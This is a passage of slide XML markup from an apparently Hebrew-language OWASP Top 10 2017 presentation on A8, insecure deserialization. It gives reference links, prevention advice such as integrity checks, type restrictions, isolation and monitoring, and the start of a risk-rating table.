                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>OWASP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800" algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="3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4"/>
              </a:rPr>
              <a:t>OWASP Cheat Sheet: Deserialization</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gn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="3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5"/>
              </a:rPr>
              <a:t>OWASP Proactive Controls: Validate All Inputs</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gn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="3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6"/>
              </a:rPr>
              <a:t>OWASP Application Security Verification Standard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800" algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="3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7"/>
              </a:rPr>
              <a:t>OWASP AppSecEU 2016: Surviving the Java Deserialization Apocalypse</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gn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>OWASP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>AppSecUSA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t> 2017: Friday the 13th JSON Attacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick r:id="rId9"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="he-IL" sz="1200" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="1100" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>הפניות חיצוניות</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800" algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>CWE-502</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>: Deserialization of Untrusted Data</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gn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="3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11"/>
              </a:rPr>
              <a:t>Java </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>Unmarshaller</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t> Security</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gn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="3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12"/>
              </a:rPr>
              <a:t>OWASP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId12"/>
              </a:rPr>
              <a:t>AppSec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId12"/>
              </a:rPr>
              <a:t> Cali 2015: Marshalling Pickles</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="109" name="Rectangle 108"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8620" y="3131840"/>
            <a:ext cx="3383280" cy="316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46800" bIns="36000" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>כיצד למנוע את הסיכון</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>דפוס הפיתוח הבטוח היחידי הינו לא לאפשר פתיחה לא מאובטחת של רצף סדרתי ממקורות לא מאומתים או להשתמש באמצעים לפתיחה של רצף סדרתי תוך שימוש במבני נתונים פשוטים (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>primitive</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>במידה והנ"ל לא מתאפשר, יש לשקול את אחת האפשרויות הבאות:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800" algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>יישום בדיקות אמינות (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>integrity checks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>) כגון חתימה דיגיטלית על בכל תהליך </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>פתיחה של רצף סדרתי </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>בכדי למנוע יצירת </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>רצף לא מאובטח </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>או שיבוש מידע</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a: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אכיפת מגבלות סוג אובייקט מחמירות בתהליך פתיחה של רצף סדרתי, טרם יצירת הרצף, מכיוון שהקוד לרוב מצפה לסט סגור של </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>classes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>. עקיפת שיטה זו הוכחה בעבר, לכן הסתמכות על שיטה זו בלבד אינה מומלצת.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>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בידוד והרצת קוד לפתיחת רצף סדרתי בסביבה בעלת הרשאות נמוכות ככל הניתן.</a:t>
            </a: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תיעוד חריגות ושגיאות בתהליך פתיחת הרצף הסדרתי, לדוגמא כאשר הקלט אינו מסוג תווים אליו מצפים, או כאשר התהליך מוציא הודעות על חריגות.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>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הגבלה או תיעוד של פעילות רשת נכנסת ויוצאת מ-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>containers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> או משרתים בעת תהליך פתיחה של רצף סדרתי.</a:t>
            </a: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ניטור התהליך והתראה במידה ומשתמש מבצע את אותה פעולה בצורה מחזורית.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Text Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="83276B"/>
          </a:solidFill>
          <a:ln w="19050">
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="63500" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="40000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>
          <a:scene3d>
            <a:camera prst="orthographicFront"/>
            <a:lightRig rig="threePt" dir="t">
              <a:rot lat="0" lon="0" rev="1200000"/>
            </a:lightRig>
          </a:scene3d>
          <a:sp3d extrusionH="76200">
            <a:bevelT w="63500" h="25400"/>
            <a:extrusionClr>
              <a:schemeClr val="bg1"/>
            </a:extrusionClr>
          </a:sp3d>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent4"/>
          </a:lnRef>
          <a:fillRef idx="3">
            <a:schemeClr val="accent4"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="accent4"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr tIns="216000" bIns="36000"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>A8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1400"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>:2017</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Title 25"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="119589"/>
            <a:ext cx="5486400" cy="762001"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r" rtl="1"/>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0"/>
              <a:t>פתיחה לא מאובטחת של רצף </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t>סדרתי (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Serialization</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="34" name="Tabelle 33"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3454626460"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="10800" y="957600"/>
          <a:ext cx="6836400" cy="2102400"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1008000">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1008000">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1396800">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1404000">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20003"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1011600">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20004"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1008000">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20005"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="554400">
                <a:tc gridSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="4572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sz="1000" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg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gridSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="4572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gridSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="4572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sz="1000" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg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xmlns="" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="288000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>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a:lnSpc>
                          <a:spcPts val="1200"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>יכולת</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> ניצול: 1</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0">
